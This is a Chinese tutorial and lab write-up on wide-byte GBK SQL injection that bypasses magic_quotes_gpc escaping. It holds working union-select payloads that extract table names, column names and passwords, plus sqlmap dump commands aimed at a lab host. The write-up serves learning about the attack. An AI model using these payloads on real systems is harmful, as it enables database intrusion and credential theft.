sql宽字节注入

magic_quotes_gpc(魔术引号开关)

https://www.cnblogs.com/timelesszhuang/p/3726736.html

magic_quotes_gpc函数在php中的作用是判断解析用户提交的数据,如包括有:post、get、cookie过来的数据增加转义字符"\",以确保这些数据不会引起程序,特别是数据库语句因为特殊字符引起的污染而出现致命的错误。

单引号(')、双引号(")、反斜线(\)等字符都会被加上反斜线

magic_quotes_gpc的作用:当PHP的传参中有特殊字符就会再前面加转义字符'\',来做一定的过滤

addslashes()函数

二者关系

php get_magic_quotes_gpc() stripslashes()和addslashes()的关系-CSDN博客

PHP为了安全性,所以引入了个magic_quotes_gpc = On的功能,可以不需要做任何处理就能直接把单引号插入数据库中,那么对于Off时,则需要考虑单引号的问题了,而不是一味地信任运行环境。

magic_quotes_gpc = On时,使用了addslashes()处理后的数据在数据库中将以\'形式保存,如果此时直接输出的话,就会发现比自己期待的内容多了个\,因此stripslashes()出场了,它能把\去掉(区别于str_replace("\", "",$Str))。

magic_quotes_gpc = Off时,使用了addslashes()处理后的数据在数据库中将以'形式保存,没有上面说的有\的问题,addslashes()起到插入数据不出错的作用,如果此时直接输出的话,数据正常。不需要再用stripslashes()。addslashes()和stripslashes()正好是相反的,直接记忆:addslashes()加个\,stripslashes()去个\

那么什么时候用呢?

简单说:

当magic_quotes_gpc = On时,系统会自动处理单引号等问题,用不用addslashes()和stripslashes()都没关系,但是如果添加数据时用了addslashes(),那么显示数据时必须要stripslashes()

当magic_quotes_gpc = Off时,系统不会处理单引号等问题,所以插入数据时必须要使用addslashes(),显示数据时则不需要使用stripslashes()。

既然有了分析,做程序时要怎么办呢?根据以上两种情况,可得:

不管magic_quotes_gpc是On还是Off,添加数据时用addslashes(),当On时,必须使用stripslashes(),Off时则不能用stripslashes()。

为了绕过magic_quotes_gpc的\,于是乎我们开始导入宽字节的概念

我们发现\的编码是%5c,然后我们会想到传参一个字符想办法凑成一个gbk字符,例如:'運'字是%df%5c

SELECT * FROM users WHERE id='1\'' LIMIT 0,1

这条语句因为\使我们无法去注入,那么我们是不是可以用%df吃到%5c,因为如果用GBK编码的话这个就是運,然后成功的让!

SELECT * FROM users WHERE id='1�\'#' LIMIT 0,1

�\ 实际上就是那个運字

宽字节概念

1、单字节字符集:所有的字符都使用一个字节来表示,比如 ASCII 编码(0-127)

2、多字节字符集:在多字节字符集中,一部分字节用多个字节来表示,另一部分(可能没有)用单个字节来表示。

3、UTF-8 编码: 是一种编码的编码方式(多字节编码),它可以使用1~4个字节表示一个符号,根据不同的符号而变化字节长度。

4、宽字节注入时利用mysql的一个特性,使用GBK编码的时候,会认为两个字符是一个汉字

宽字节sql注入

宽字节SQL注入就是PHP发送请求到MySql时使用了语句

SET NAMES 'gbk' 或是SET character_set_client =gbk 进行了一次编码,但是又由于一些不经意的字符集转换导致了宽字节注入。

实战(墨者)

手工

找到注入点

发现3,5是回显点

复制代码
?id=-1%df' union select 1,2,database(),4,5--+

?id=-1%df' union select 1,2,3,4,group_concat(table_name) from information_schema.tables where table_schema=database() --+

然后我们在查询列名的时候,发现因为单引号无法闭合而报错

复制代码
?id=-1%df' union select 1,2,3,4,group_concat(column_name) from information_schema.columns where table_name='stormgroup_member' --+

这里应该怎么解决呢?

看了wp,转成了十六进制

嗯。。不错

payload:

复制代码
?id=-1%df' union select 1,2,3,4,group_concat(column_name) from information_schema.columns where table_name=0x73746f726d67726f75705f6d656d626572 --+

有了

复制代码
?id=-1%df' union select 1,2,3,4,group_concat(name) from stormgroup_member --+

?id=-1%df' union select 1,2,3,4,group_concat(password) from stormgroup_member --+

tamper

复制代码
sqlmap.py -u "http://124.70.71.251:48968/new_list.php?id=1" --tamper=unmagicquotes.py --dbs
复制代码
sqlmap.py -u "http://124.70.71.251:48968/new_list.php?id=1" --tamper=unmagicquotes.py -D mozhe_discuz_stormgroup --tables
复制代码
sqlmap.py -u "http://124.70.71.251:48968/new_list.php?id=1" --tamper=unmagicquotes.py -D mozhe_discuz_stormgroup -T stormgroup_member --columns
复制代码
sqlmap.py -u "http://124.70.71.251:48968/new_list.php?id=1" --tamper=unmagicquotes.py -D mozhe_discuz_stormgroup -T stormgroup_member --dump
相关推荐
lpruoyu10 小时前
MySQL整理【03】事务隔离级别和MVCC
数据库·mysql
li357410 小时前
深入理解:MQ监听类 vs Spring事件监听类 —— 区别、用法与适用场景全解析
java·数据库·spring
安然~~~11 小时前
mysql的索引
数据库·mysql
GBASE11 小时前
GBASE南大通用技术分享:GBase 8s数据库典型安装(命令行方式)
数据库
康惠桀11 小时前
Oracle UNDO表空间监控指南
数据库·oracle
SeaTunnel11 小时前
实测有效|用 SeaTunnel 免费实现 MySQL→Oracle 实时同步,步骤超细
数据库·mysql·oracle·开源·seatunnel·数据同步·连接器
Mr.朱鹏11 小时前
ShardingJDBC实战指南
java·jvm·数据库·spring·分库分表·shardingjdbc·shardingshere
咔咔一顿操作11 小时前
MySQL 事务管理与锁机制:解决并发场景下的数据一致性问题
java·数据库·mysql
麦兜*12 小时前
MongoDB 备份与恢复终极指南:mongodump 和 mongorestore 深度实战
java·数据库·spring boot·mongodb·spring
xhbh66613 小时前
MySQL数据导出避坑指南:如何选择正确的工具并设计安全的备份策略?
数据库·mysql·oracle·程序员·mysql导出数据库